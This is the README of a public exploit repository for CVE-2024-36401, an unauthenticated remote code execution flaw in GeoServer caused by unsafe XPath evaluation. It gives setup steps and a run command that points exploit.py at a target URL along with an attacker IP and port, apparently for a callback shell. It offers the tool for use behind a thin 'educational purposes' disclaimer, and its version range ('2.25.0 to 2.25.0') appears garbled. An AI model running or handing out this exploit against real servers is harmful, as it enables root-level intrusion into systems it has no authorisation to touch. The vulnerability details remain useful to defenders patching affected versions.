GeoServer Remote Code Execution# 🚀 GeoServer Exploit for CVE-2024-36401 🚀
## 📝 Description
**GeoServer** is an open-source Java-based software server that enables users to view, edit, and share geospatial data. It offers a versatile and efficient solution for distributing geospatial information from various sources such as GIS databases, web-based data, and personal datasets.
In versions of GeoServer earlier than **2.23.6**, versions **2.24.0** to **2.24.3**, and versions **2.25.0** to **2.25.0**, there exists a vulnerability (**CVE-2024-36401**) that permits Remote Code Execution (RCE) by unauthenticated users. This issue arises from the unsafe evaluation of property names as XPath expressions in multiple OGC request parameters.
Exploiting this vulnerability, an attacker can send a POST request containing a malicious XPath expression, which can result in arbitrary command execution as root on the system running GeoServer.
## 🛠️ Setup
### Requirements
Install the required libraries using pip:
```sh
pip install -r requirements.txt
```
## 🚀 Usage
1. Clone the repository:
```sh
git clone https://github.com/Chocapikk/CVE-2024-36401.git
cd CVE-2024-36401
```
2. Run the exploit script with the required parameters:
```sh
python exploit.py -u <target_url> -ip <your_ip> -port <your_port> [--proxy <proxy_url>] [--bind-host <bind_host>] [--bind-port <bind_port>]
```
### Example:
```sh
python exploit.py -u http://localhost:8080 -ip 192.168.1.36 -port 1337 --proxy http://127.0.0.1:8081
```
## 📜 Example Output
## 🙏 Credits
This exploit code was created by:
- [Chocapikk](https://github.com/Chocapikk)
- [K3ysTr0K3R](https://github.com/K3ysTr0K3R)
## ⚠️ Disclaimer
This exploit is for educational purposes only. Use it at your own risk. The author is not responsible for any damage caused by this code.
[4.0K] /data/pocs/3cc1cf593c87f329aaeb9705f63d604471cdf916
├── [6.7K] exploit.py
├── [140K] geo.png
├── [1.8K] README.md
└── [ 30] requirements.txt
0 directories, 4 files